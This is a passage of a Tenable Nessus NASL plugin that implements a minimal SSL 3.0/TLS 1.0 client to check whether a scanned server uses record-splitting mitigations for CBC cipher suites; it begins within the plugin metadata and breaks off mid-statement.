script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\");\n script_require_keys(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"http.inc\");\ninclude(\"ldap_func.inc\");\ninclude(\"nntp_func.inc\");\ninclude(\"smtp_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"x509_func.inc\");\ninclude(\"rsync.inc\");\ninclude(\"audit.inc\");\ninclude(\"string.inc\");\n\nglobal_var _ssl;\n\nif (!get_kb_item(\"Settings/PCI_DSS\") && !thorough_tests) exit(0, \"This plugin only runs if 'Thorough tests' is enabled or if PCI scanning is enabled.\");\n##\n# Get cipher description.\n#\n# @return Value of ciphers_desc[<name>] from ssl_funcs.inc.\n##\nfunction ssl3_get_cipher_desc()\n{\n local_var cipher, name;\n\n if (!isnull(_ssl['cipher_desc']))\n return _ssl['cipher_desc'];\n\n cipher = _ssl['cipher'];\n name = cipher_name(id:cipher);\n if (isnull(name)) return NULL;\n\n return ciphers_desc[name];\n}\n\n##\n# Checks whether a cipher is in a list of cipher suites.\n#\n# @anonparam cipher Cipher in question.\n# @anonparam ciphers List of cipher suites.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction ssl3_cipher_in_list()\n{\n local_var cipher, ciphers, i, id, len;\n\n cipher = _FCT_ANON_ARGS[0];\n ciphers = _FCT_ANON_ARGS[1];\n\n len = strlen(ciphers);\n for (i = 0; i < len; i += 2)\n {\n id = substr(ciphers, i, i + 2 - 1);\n if (cipher == id) return TRUE;\n }\n\n return FALSE;\n}\n\n##\n# Split the key block into IVs, cipher keys, and MAC keys.\n#\n# @anonparam keyblk Key block derived from the master secret.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction ssl3_set_keys()\n{\n local_var desc, mac_size, iv_size, key_size, keyblk, pos;\n local_var encrypt, mac;\n\n desc = ssl3_get_cipher_desc();\n if (isnull(desc)) return FALSE;\n\n encrypt = cipher_field(name:desc, field:\"encrypt\");\n mac = cipher_field(name:desc, field:\"mac\");\n\n keyblk = _FCT_ANON_ARGS[0];\n\n # Determine the size of the key block's fields.\n if ('SHA1' >< mac) mac_size = 20;\n else if ('MD5' >< mac) mac_size = 16;\n else return FALSE;\n\n if ('3DES-CBC(168)' >< encrypt) { key_size = 24; iv_size = 8; }\n else if ('DES-CBC(56)' >< encrypt) { key_size = 8; iv_size = 8; }\n else if ('AES-CBC(128)' >< encrypt) { key_size = 16; iv_size = 16; }\n else if ('AES-CBC(256)' >< encrypt) { key_size = 32; iv_size = 16; }\n else return FALSE;\n\n # Ensure the block is big enough.\n if (strlen(keyblk) < 2 * (mac_size + key_size + iv_size))\n return FALSE;\n\n # Extract the data from the key block.\n pos = 0;\n _ssl['enc_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n _ssl['dec_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n _ssl['enc_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n _ssl['dec_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n _ssl['enc_iv'] = substr(keyblk, pos, pos + iv_size - 1); pos += iv_size;\n _ssl['dec_iv'] = substr(keyblk, pos, pos + iv_size - 1);\n\n return TRUE;\n}\n\n##\n# Hashes data.\n#\n# @anonparam data Data to be hashed.\n#\n# @return Message digest of the given data.\n##\nfunction ssl3_hash()\n{\n local_var data, desc;\n\n desc = cipher_field(name:ssl3_get_cipher_desc(), field:\"mac\");\n if (empty_or_null(desc)) return NULL;\n\n data = _FCT_ANON_ARGS[0];\n\n if ('SHA1' >< desc)\n return SHA1(data);\n\n if ('MD5' >< desc)\n return MD5(data);\n\n return NULL;\n}\n\n##\n# Compute the HMAC of the data.\n#\n# @anonparam data Data to be HMACed.\n# @anonparam key The key for the HMAC algorithm.\n#\n# @return HMAC of the given data.\n##\nfunction ssl3_hmac()\n{\n local_var data, desc, key;\n\n desc = cipher_field(name:ssl3_get_cipher_desc(), field:\"mac\");\n if (empty_or_null(desc)) return NULL;\n\n key = _FCT_ANON_ARGS[0];\n data = _FCT_ANON_ARGS[1];\n\n if ('SHA1' >< desc)\n return HMAC_SHA1(key:key, data:data);\n\n if ('MD5' >< desc)\n return HMAC_MD5(key:key, data:data);\n\n return NULL;\n}\n\n##\n# Computes the MAC of the data.\n#\n# @param client Whether the data is from the client or server.\n# @param data The data to be calculate the MAC of.\n# @param type The type of the record.\n#\n# @returns The MAC of the given data, in protocol-specific form.\n##\nfunction ssl3_mac(client, data, type)\n{\n local_var key, seq;\n\n if (isnull(client))\n client = TRUE;\n\n if (client)\n {\n key = _ssl['enc_mac_key'];\n seq = _ssl['clt_seq'];\n }\n else\n {\n key = _ssl['dec_mac_key'];\n seq = _ssl['srv_seq'];\n }\n\n # Encode the client sequence number.\n seq = mkdword(0) + mkdword(seq);\n\n if (_ssl['version'] == SSL_V3)\n {\n return ssl3_hash(\n key + # Key\n crap(data:'\\x5c', length:40) + # O-Pad\n ssl3_hash( #\n key + # Key\n crap(data:'\\x36', length:40) + # I-Pad\n seq + # 64-bit sequence number\n mkbyte(type) + # Record ID\n mkword(strlen(data)) + # Data length\n data # Data\n )\n );\n }\n\n if (_ssl['version'] == TLS_10)\n {\n return ssl3_hmac(\n key,\n seq + tls_mk_record(type:type, data:data, version:TLS_10)\n );\n }\n\n return NULL;\n}\n\n##\n# Encrypt or decrypt data.\n#\n# @anon param data input data\n# @param enc Whether to encrypt (TRUE) or decrypt (FALSE).\n#\n# @return Result of encrypting or decrypting the given data.\n##\nfunction ssl3_crypt(enc)\n{\n local_var data, desc, iv, key, out, ret;\n\n desc = cipher_field(name:ssl3_get_cipher_desc(), field:\"encrypt\");\n if (empty_or_null(desc)) return NULL;\n\n data = _FCT_ANON_ARGS[0];\n\n if (enc)\n {\n key = _ssl['enc_key'];\n iv = _ssl['enc_iv'];\n }\n else\n {\n key = _ssl['dec_key'];\n iv = _ssl['dec_iv'];\n }\n\n if ('3DES-CBC(168)' >< desc)\n {\n if (enc)\n ret = tripledes_cbc_encrypt(data:data, key:key, iv:iv);\n else\n ret = tripledes_cbc_decrypt(data:data, key:key, iv:iv);\n }\n else if ('DES-CBC(56)' >< desc)\n {\n out = des_cbc_encrypt(data:data, key:key, iv:iv, encrypt:enc);\n if (enc)\n ret = make_list(out, substr(out, strlen(out) - 8));\n else\n ret = make_list(out, substr(data, strlen(data) - 8));\n }\n else if ('AES-CBC(128)' >< desc || 'AES-CBC(256)' >< desc)\n {\n if (enc)\n ret = aes_cbc_encrypt(data:data, key:key, iv:iv);\n else\n ret = aes_cbc_decrypt(data:data, key:key, iv:iv);\n }\n\n if (isnull(ret)) return NULL;\n\n # Update IV for the next block.\n if (enc)\n _ssl['enc_iv'] = ret[1];\n else\n _ssl['dec_iv'] = ret[1];\n\n return ret[0];\n}\n\n##\n# Encrypt data with the block cipher.\n#\n# @anonparam data The data to be encrypted.\n#\n# @return The ciphertext of the given data.\n##\nfunction ssl3_encrypt()\n{\n local_var data, block_size, padlen;\n\n data = _FCT_ANON_ARGS[0];\n\n # Calculate how much padding is needed to fill the block.\n block_size = strlen(_ssl['enc_iv']);\n padlen = block_size - (strlen(data) % block_size);\n\n # Append the padding to the data.\n data += crap(data:mkbyte(padlen - 1), length:padlen);\n\n return ssl3_crypt(data, enc:TRUE);\n}\n\n##\n# Decrypt data with the block cipher.\n#\n# @anonparam data The data to be decrypted.\n#\n# @return The plaintext of the given data.\n##\nfunction ssl3_decrypt()\n{\n return ssl3_crypt(_FCT_ANON_ARGS[0], enc:FALSE);\n}\n\n##\n# Sets an error message\n#\n# @anonparam msg The error message.\n#\n# @return NULL.\n##\nfunction ssl3_set_error()\n{\n _ssl['error'] = _FCT_ANON_ARGS[0];\n\n return NULL;\n}\n\n##\n# Get last error message.\n#\n# @return Last error message.\n##\nfunction ssl3_get_lasterror()\n{\n return _ssl['error'];\n}\n\n##\n# Write data from an established SSL connection.\n#\n# @anonparam data Data to be written.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction ssl3_write()\n{\n local_var data, dlen, mac, rec, rlen, sent, type;\n\n data = _FCT_ANON_ARGS[0];\n\n type = SSL3_CONTENT_TYPE_APPLICATION_DATA;\n dlen = strlen(data);\n\n # Compute the MAC of the unencrypted application data.\n mac = ssl3_mac(data:data, type:type);\n\n # Append the MAC to the data and encrypt everything.\n data = ssl3_encrypt(data + mac);\n\n # Make a record and send it to the server.\n rec = ssl_mk_record(type:type, data:data, version:_ssl['version']);\n rlen = strlen(rec);\n sent = send(socket:_ssl['sock'], data:rec);\n if (sent != rlen)\n return ssl3_set_error('ssl3_write(): Only sent ' + sent + ' of ' + rlen + ' bytes to port ' + _ssl['port'] + '.');\n\n _ssl['clt_seq']++;\n\n return dlen;\n}\n\n##\n# Read data from an established SSL connection.\n#\n# @param len Number of bytes to be read.\n#\n# @return Data read, or NULL if there is an error.\n##\nfunction ssl3_read(len)\n{\n local_var computed_mac, data, dlen, embedded_mac, end, i, maclen;\n local_var msg, padlen, rec, srv_seq, start, timeout;\n\n # Return data can be split into multiple records.\n while (TRUE)\n {\n # Check if we have received enough received data to satisfy the\n # caller.\n if (len && strlen(_ssl['app_data']) >= len)\n {\n # Remove the requested amount of data from the receive buffer.\n data = substr(_ssl['app_data'], 0, len - 1);\n _ssl['app_data'] -= data;\n\n return data;\n }\n\n # Receive an SSL message.\n # Some Microsoft Exchange servers take many seconds to reply to an\n # SMTP command, causing this check to false-negative.\n # Obey a longer read timeout, but make 15 seconds the minimum to\n # cope with these servers.\n timeout = get_read_timeout();\n if (timeout < 15)\n timeout = 15;\n msg = recv_ssl(socket:_ssl['sock'], timeout:timeout);\n if (isnull(msg)) break;\n\n # Parse the message, keeping in mind that the body is encrypted.\n rec = ssl_parse(blob:msg, encrypted:TRUE);\n if (isnull(rec))\n return ssl3_set_error('ssl3_read(): Failed to parse encrypted SSL record.');\n\n # Check protocol version.\n if (rec['version'] != _ssl['version'])\n return ssl3_set_error('ssl3_read(): SSL/TLS protocol version mismatch.');\n\n # Ensure that the record isn't an alert.\n if (rec['content_type'] == SSL3_CONTENT_TYPE_ALERT)\n return ssl3_set_error('ssl3_read(): Alert received from port ' + _ssl['port'] + '.');\n\n # Decrypt the application data.\n data = ssl3_decrypt(rec['data']);\n dlen = strlen(data);\n\n # Check that padding on the data is sane.\n maclen = strlen(_ssl['enc_mac_key']);\n padlen = getbyte(blob:data, pos:dlen - 1);\n if (padlen + 1 + maclen > dlen)\n return ssl3_set_error('ssl3_read(): invalid padlen ' + padlen + '.');\n\n # Check pad bytes for TLS 1.0\n # For SSL 3.0, pad bytes can have arbitrary values\n # For TLS 1.0, each pad byte must be same as padlen\n if (_ssl['version'] >= TLS_10)\n {\n for (i = 0; i < padlen; i++)\n {\n if(ord(data[dlen - 2 -i]) != padlen)\n return ssl3_set_error('ssl3_read(): invalid block cipher padding.');\n }\n }\n\n # Extract the MAC, which is appended to the payload.\n end = dlen - (padlen + 1) - 1;\n start = end - maclen + 1;\n embedded_mac = substr(data, start, end);\n\n # Extract decrypted application data.\n end = start - 1;\n start = 0;\n data = substr(data, start, end);\n\n\n # Compute the MAC of the decrypted application data.\n computed_mac = ssl3_mac(data:data, type:rec['content_type'], client:FALSE);\n\n # Compare the embedded MAC and the computed MAC.\n if (computed_mac != embedded_mac)\n return ssl3_set_error('ssl3_read(): MACs do not match.');\n\n # The MAC was proper, so this packet is accepted.\n _ssl['srv_seq']++;\n\n # Add application data to our receive buffer.\n if (rec['content_type'] == SSL3_CONTENT_TYPE_APPLICATION_DATA)\n {\n _ssl['app_data'] += data;\n _ssl['app_recs'] += 1;\n\n\n # Check for mitigation techniques:\n # - Empty records: OpenSSL uses this technique if\n # SSL_OP_DONT_INSERT_EMPTY_FRAGMENTS is not set.\n # - One-byte records: Microsoft uses this technique.\n #\n # Check for split-record for the first 2 app data records\n if(_ssl['app_recs'] < 3)\n {\n if (isnull(data))\n _ssl['empty_rec'] = TRUE;\n else if (strlen(data) == 1)\n _ssl['one_byte_rec'] = TRUE;\n }\n }\n }\n\n # If the read length could not be satisfied, return whatever is in\n # the receive buffer, and clear it for future calls.\n data = _ssl['app_data'];\n _ssl['app_data'] = '';\n\n if (empty_or_null(data) && socket_get_error(_ssl['sock']) == ETIMEDOUT)\n return ssl3_set_error('ssl3_read(): Server did not reply after waiting ' + timeout + ' seconds. Consider increasing the read timeout in your scan policy.');\n\n return data;\n}\n\n##\n# Disconnect from the SSL server.\n##\nfunction ssl3_disconnect()\n{\n close(_ssl['sock']);\n}\n\n##\n# Tries to make an SSL/TLS connection to the server.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction ssl3_connect()\n{\n local_var cert, cipher, ckex, clt_finished, clt_random;\n local_var dh_privkey, pubkey;\n local_var dh_x, e, embedded_mac, embedded_srv_finished;\n local_var end, hs, i,keyblk, len, mac, mac_size;\n local_var master, msg, n, padlen, parsed, pkt, plain, port;\n local_var premaster, rec, recs, skex, soc, srv_finished, srv_random;\n local_var start, version, x;\n\n # Get a socket to perform a handshake.\n port = _ssl['port'];\n soc = open_sock_ssl(port);\n if (!soc)\n return ssl3_set_error('ssl3_connect(): Failed to connect to port ' + port + '.');\n\n version = _ssl['version'];\n cipher = _ssl['cipher'];\n\n # Make a ClientHello msg.\n msg =\n mkword(version) + # Client version\n dec2hex(num:unixtime()) + # Challenge, epoch portion\n rand_str(length:28) + # Challenge, random portion\n ssl_vldata_put(data:'', len:1) + # Session ID\n ssl_vldata_put(data:cipher, len:2) + # Cipher spec\n ssl_vldata_put(data:'\\x00', len:1) + # Compression spec\n ssl_vldata_put(data:tls_ext_ec(keys(curve_nid.tls)), len:2); # supported curves\n msg = ssl_mk_handshake_msg(data:msg, type:SSL3_HANDSHAKE_TYPE_CLIENT_HELLO);\n rec = ssl_mk_record(type:SSL3_CONTENT_TYPE_HANDSHAKE, data:msg, version:version);\n\n # Send the ClientHello record.\n send(socket:soc, data:rec);\n\n # Parse the ClientHello record.\n parsed = ssl_parse(blob:rec);\n clt_random = mkdword(parsed['time']) + parsed['random'];\n\n # Start collecting the bodies of handshake messages, which are used\n # to generate the encrypted Finished message.\n hs = substr(rec, 5, strlen(rec) - 1);\n\n # Read records one at a time. Expect to see at a minimum:\n # ServerHello, Certificate, and ServerHelloDone.\n while (TRUE)\n {\n # Receive records from the server.\n recs = recv_ssl(socket:soc);\n if (isnull(recs))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': server did not respond to ClientHello.');\n }\n\n # Collect the body of the message, including all records.\n hs += substr(recs, 5, strlen(recs) - 1);\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:recs,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n\n if (!isnull(rec))\n {\n # Check handshake version returned by the server, and ensure\n # that it hasn't downgraded the version.\n if (rec['handshake_version'] != _ssl['version'])\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': SSL/TLS protocol version mismatch.');\n }\n\n srv_random = mkdword(rec['time']) + rec['random'];\n\n # Wacko SSL servers might return a cipher suite not in the\n # client's request list.\n if (!ssl3_cipher_in_list(mkword(rec['cipher_spec']), _ssl['cipher']))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': server returned a cipher suite not in list supported by client.');\n }\n\n # Store the negotiated cipher suite.\n _ssl['cipher'] = rec['cipher_spec'];\n _ssl['cipher_desc'] = ssl3_get_cipher_desc();\n }\n\n # Certificate: Extract the server's public key.\n rec = ssl_find(\n blob:recs,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE\n );\n\n if (!isnull(rec) && max_index(rec['certificates']) > 0)\n {\n # First cert in the chain should be the server cert.\n cert = parse_der_cert(cert:rec['certificates'][0]);\n if (isnull(cert))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': server certificate could not be parsed.');\n }\n\n cert = cert['tbsCertificate'];\n }\n\n # Server Key Exchange.\n rec = ssl_find(\n blob:recs,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_KEY_EXCHANGE\n );\n\n if (!isnull(rec['data']))\n skex = ssl_parse_srv_kex(blob:rec['data'], cipher:_ssl['cipher_desc']);\n\n # Certificate Request.\n rec = ssl_find(\n blob:recs,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST\n );\n\n if (!isnull(rec['data']))\n _ssl['clt_cert_requested'] = TRUE;\n\n # Server Hello Done.\n rec = ssl_find(\n blob:recs,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n\n if (!isnull(rec)) break;\n }\n\n # Packet will contain ClientCertificate, ClientKeyExchange,\n # ChangeCipherSpec, and Finished.\n pkt = '';\n\n # Create an empty client certificate if one is requested.\n if (_ssl['clt_cert_requested'])\n {\n # Send an empty certificate for now. TLSv1.0 says the client can\n # send an empty certificate, but not sure what SSLv3 says.\n msg = ssl_mk_handshake_msg(\n type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,\n data : ssl_vldata_put(data:NULL,len:3)\n );\n hs += msg;\n\n rec = ssl_mk_record(type:SSL3_CONTENT_TYPE_HANDSHAKE, data:msg, version:version);\n pkt += rec;\n }\n\n # Process ServerCertificate and ServerKeyExchange messages.\n var desc_kex = cipher_field(name:_ssl['cipher_desc'], field:\"kex\");\n if (desc_kex =~ \"RSA($|\\()\")\n {\n if (isnull(cert))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': No server certificate was found.');\n }\n\n if (isnull(cert['subjectPublicKeyInfo']) || isnull(cert['subjectPublicKeyInfo'][1]))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': A server certificate with an unsupported algorithm was found.');\n }\n\n n = cert['subjectPublicKeyInfo'][1][0];\n e = cert['subjectPublicKeyInfo'][1][1];\n if(isnull(n) || isnull(e))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': Failed to extract public key from server certificate.');\n }\n\n # Create the premaster secret.\n premaster = mkword(version) + rand_str(length:46);\n\n # Encrypt the premaster secret with server's RSA public key.\n ckex = rsa_public_encrypt(data:premaster, n:n, e:e);\n\n # Encode the client key exchange data.\n #\n # It looks like TLS 1.0 and up prepend a two-byte length, but the\n # RFC is vague.\n if (_ssl['version'] >= TLS_10)\n ckex = ssl_vldata_put(data:ckex, len:2);\n }\n else if (desc_kex =~ \"ECDH($|\\()\" && ecc_functions_available())\n {\n if (isnull(skex))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': no ServerKeyExchange info (ECDH).');\n }\n\n # Generate the client private key\n dh_privkey = rand_str(length:16);\n\n # Compute the premaster secret\n premaster = ecc_scalar_multiply(\n curve_nid:curve_nid.tls[skex['named_curve']],\n scalar:dh_privkey,\n x:substr(skex['pubkey'], 1, (strlen(skex['pubkey'])) / 2),\n y:substr(skex['pubkey'], (strlen(skex['pubkey']) / 2) + 1)\n );\n # Just the X coordinate of the curve point is used\n premaster = ecc_fe2osp(element:premaster.x, curve_nid:curve_nid.tls[skex['named_curve']]);\n\n # Encode the client's DH public key\n pubkey = ecc_scalar_multiply(\n curve_nid:curve_nid.tls[skex['named_curve']],\n scalar:dh_privkey\n );\n\n pubkey.x = ecc_fe2osp(element:pubkey.x, curve_nid:curve_nid.tls[skex['named_curve']]);\n pubkey.y = ecc_fe2osp(element:pubkey.y, curve_nid:curve_nid.tls[skex['named_curve']]);\n\n ckex = ssl_vldata_put(\n # Uncompressed curve point encoding\n data:'\\x04' + pubkey.x + pubkey.y,\n len:1\n );\n }\n else if (desc_kex =~ \"DH($|\\()\")\n {\n if (isnull(skex))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': no ServerKeyExchange info (DH).');\n }\n\n # Generate the client private key,\n x = rand_str(length:16);\n\n # Compute g^x mod p.\n dh_x = bn_mod_exp(skex['dh_g'], x, skex['dh_p']);\n\n # Compute the premaster secret.\n premaster = bn_mod_exp(skex['dh_y'], x, skex['dh_p']);\n\n # Encode the client key exchange data.\n ckex = ssl_vldata_put(data:dh_x, len:2);\n }\n else\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': unsupported key exchange method ' + _ssl['cipher_desc'] + '.');\n }\n\n # Create a ClientKeyExchange message.\n msg = ssl_mk_handshake_msg(type:SSL3_HANDSHAKE_TYPE_CLIENT_KEY_EXCHANGE, data:ckex);\n hs += msg;\n\n rec = ssl_mk_record(type:SSL3_CONTENT_TYPE_HANDSHAKE, data:msg, version:version);\n pkt += rec;\n\n # Compute the keys.\n master = ssl_calc_master(\n premaster : premaster,\n c_random : clt_random,\n s_random : srv_random,\n version : version\n );\n\n # For troubleshooting problems, when a PCAP is provided by a customer\n # and we need to see the encrypted application data records.\n set_kb_item(\n name:\"nss_keylog/\" + SCRIPT_NAME,\n value:\"CLIENT_RANDOM \" + hexstr(clt_random) + \" \" + hexstr(master)\n );\n\n keyblk = ssl_derive_keyblk(\n master : master,\n c_random : clt_random,\n s_random : srv_random,\n version : version\n );\n\n if (!ssl3_set_keys(keyblk))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect(): ssl3_set_keys() failed.');\n }\n\n # Compute the Finished value for the client.\n clt_finished = ssl_calc_finished(master:master, handshake:hs, is_client:TRUE, version:version);\n msg = ssl_mk_handshake_msg(type:SSL3_HANDSHAKE_TYPE_FINISHED, data:clt_finished);\n\n # Compute the Finished value for the server.\n #\n # The server has one more handshake message (the client's Finished)\n # to include when computing its Finished value.\n hs += msg;\n srv_finished = ssl_calc_finished(master:master, handshake:hs, is_client:FALSE, version:version);\n\n # Compute the HMAC of the Finished message for the client.\n mac = ssl3_mac(data:msg, type:SSL3_CONTENT_TYPE_HANDSHAKE);\n\n # Append the HMAC to the message.\n msg += mac;\n\n # Encrypt the client Finished message\n msg = ssl3_encrypt(msg);\n\n # Append the ChangeCipherSpec and Finished records to the packet.\n pkt += ssl_mk_record(type:SSL3_CONTENT_TYPE_CHANGECIPHERSPEC, data:mkbyte(1), version:version);\n pkt += ssl_mk_record(type:SSL3_CONTENT_TYPE_HANDSHAKE, data:msg, version:version);\n\n # Send the packet.\n send(socket:soc, data:pkt);\n\n while (TRUE)\n {\n # Receive records from the server.\n recs = recv_ssl(socket:soc);\n if (isnull(recs))\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': server did not send the Finished message.');\n }\n\n # Finished, but it's encrypted so we can't access the handshake\n # type with ssl_parse().\n rec = ssl_find(\n blob:recs,\n encrypted:TRUE,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE\n );\n if (isnull(rec)) continue;\n\n # Decrypt the record's body.\n plain = ssl3_decrypt(rec['data']);\n\n # Get the length of the padding.\n len = strlen(plain);\n padlen = getbyte(blob:plain, pos:len - 1);\n mac_size = strlen(_ssl['enc_mac_key']);\n # Check pad length\n if (padlen + 1 + mac_size > len)\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': invalid padlen '+padlen+'.');\n }\n\n # Check pad bytes for TLS 1.0\n # Each pad byte must be the same as the padlen, per TLS 1.0 RFC\n if(_ssl['version'] >= TLS_10)\n {\n for (i = 0; i < padlen; i++)\n {\n if(ord(plain[len - 2 -i]) != padlen)\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': invalid block cipher padding.');\n }\n }\n }\n\n # Extract the MAC.\n end = len - (padlen + 1) - 1;\n start = end - mac_size + 1;\n embedded_mac = substr(plain, start, end);\n\n # Extract the Finished record.\n end = start - 1;\n start = 0;\n msg = substr(plain, start, end);\n\n # Extract the server's Finished value.\n #\n # Handshake message data starts after the 1-byte handshake type\n # and 3-byte handshake message length.\n embedded_srv_finished = substr(msg, 1 + 3);\n\n # Check the embedded MAC against ours.\n mac = ssl3_mac(data:msg, type:SSL3_CONTENT_TYPE_HANDSHAKE, client:FALSE);\n if (mac != embedded_mac)\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': MACs do not match, failed to decrypt server Finished message.');\n }\n\n # Check the embedded Finished value against ours.\n if (srv_finished != embedded_srv_finished)\n {\n close(soc);\n return ssl3_set_error('ssl3_connect() on port ' + port + ': bad server Finished message.');\n }\n\n # All tests have been passed, so the handshake phase is complete.\n break;\n }\n\n _ssl['sock'] = soc;\n _ssl['clt_seq']++;\n _ssl['srv_seq']++;\n\n return TRUE;\n}\n\n##\n# Initialize the SSL structure.\n#\n# @param port Port on which to make an SSL connection.\n# @param cipher_list A list of cipher suite IDs to support.\n# @param version The SSL version ID.\n#\n# @return TRUE if nothing went wrong.\n##\nfunction ssl3_init(port, cipher_list, version)\n{\n local_var cipher, supported;\n\n # Check for the existence of some crypto functions.\n if (!defined_func('bn_mod_exp'))\n {\n return ssl3_set_error('function bn_mod_exp() not defined.');\n }\n if (!defined_func('rsa_public_encrypt'))\n {\n return ssl3_set_error('function rsa_public_encrypt() not defined.');\n }\n if (!defined_func('aes_cbc_encrypt'))\n {\n return ssl3_set_error('function aes_cbc_encrypt() not defined.');\n }\n if (!defined_func('aes_cbc_decrypt'))\n {\n return ssl3_set_error('function aes_cbc_decrypt() not defined.');\n }\n\n # Check SSL version.\n if (version != SSL_V3 && version != TLS_10)\n {\n return ssl3_set_error('SSL/TLS version ' + hexstr(mkword(version)) + ' is not supported.');\n }\n _ssl['version'] = version;\n\n # Check cipher suites.\n supported =\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_3DES_EDE_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_128_CBC_SHA'] +\n ciphers['TLS1_CK_DHE_RSA_WITH_3DES_EDE_CBC_SHA'] +\n ciphers['TLS1_CK_RSA_WITH_DES_CBC_SHA'] +\n ciphers['TLS1_CK_ECDHE_RSA_WITH_AES_128_CBC_SHA'] +\n ciphers['TLS1_CK_ECDHE_RSA_WITH_AES_256_CBC_SHA'] +\n ciphers['TLS1_CK_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA'];\n\n foreach cipher (cipher_list)\n {\n if (!ssl3_cipher_in_list(cipher, supported))\n return ssl3_set_error(FALSE, 'cipher suite ' + hexstr(cipher) + ' is not supported.');\n }\n\n # Initially set to a list of cipher suites supported by the client.\n # When ServerHello is received, it's set to the agreed cipher.\n _ssl['cipher'] = '';\n foreach cipher (cipher_list)\n {\n _ssl['cipher'] += cipher;\n }\n\n # Sequence number is incremented for each SSL record sent in each\n # direction. It's 64 bits long and used when computing the MAC of a\n # message. We use a 32-bit sequence number here as we don't expect\n # to use more than 2^32 records. When the 64-bit number is required\n # for certain operations, we just prepend 4 zero bytes in the front.\n _ssl['clt_seq'] = 0;\n _ssl['srv_seq'] = 0;\n\n # SSL uses big endian format.\n set_byte_order(BYTE_ORDER_BIG_ENDIAN);\n\n # Keep track of whether the mitigation techniques are seen.\n _ssl['empty_rec'] = FALSE;\n _ssl['one_byte_rec'] = FALSE;\n\n # Whether a certificate has been requested by the server.\n _ssl['clt_cert_req'] = FALSE;\n\n # Keep track of received, unprocessed application data.\n _ssl['app_data'] = '';\n\n # Number of application data records received\n _ssl['app_recs'] = 0;\n\n _ssl['port'] = port;\n\n return TRUE;\n}\n\nget_kb_item_or_exit('SSL/Supported');\n\n# Get a port that uses SSL.\nport = get_ssl_ports(fork:TRUE);\n\nif (isnull(port))\n exit(1, 'The host does not appear to have any SSL-based services.');\n\n# Find out if the port is open.\nif (!get_port_state(port))\n audit(AUDIT_PORT_CLOSED, port);\n\n# Supported cipher suites used by this script.\ncipher_list = make_list(\n ciphers['TLS1_CK_RSA_WITH_AES_256_CBC_SHA'],\n ciphers['TLS1_CK_RSA_WITH_AES_128_CBC_SHA'],\n ciphers['TLS1_CK_RSA_WITH_3DES_EDE_CBC_SHA'],\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_256_CBC_SHA'],\n ciphers['TLS1_CK_DHE_RSA_WITH_AES_128_CBC_SHA'],\n ciphers['TLS1_CK_DHE_RSA_WITH_3DES_EDE_CBC_SHA'],\n ciphers['TLS1_CK_RSA_WITH_DES_CBC_SHA']\n);\n\nif (ecc_functions_available())\n{\n # This list will be flattened on its own by make_list().\n cipher_list = make_list(\n cipher_list,\n 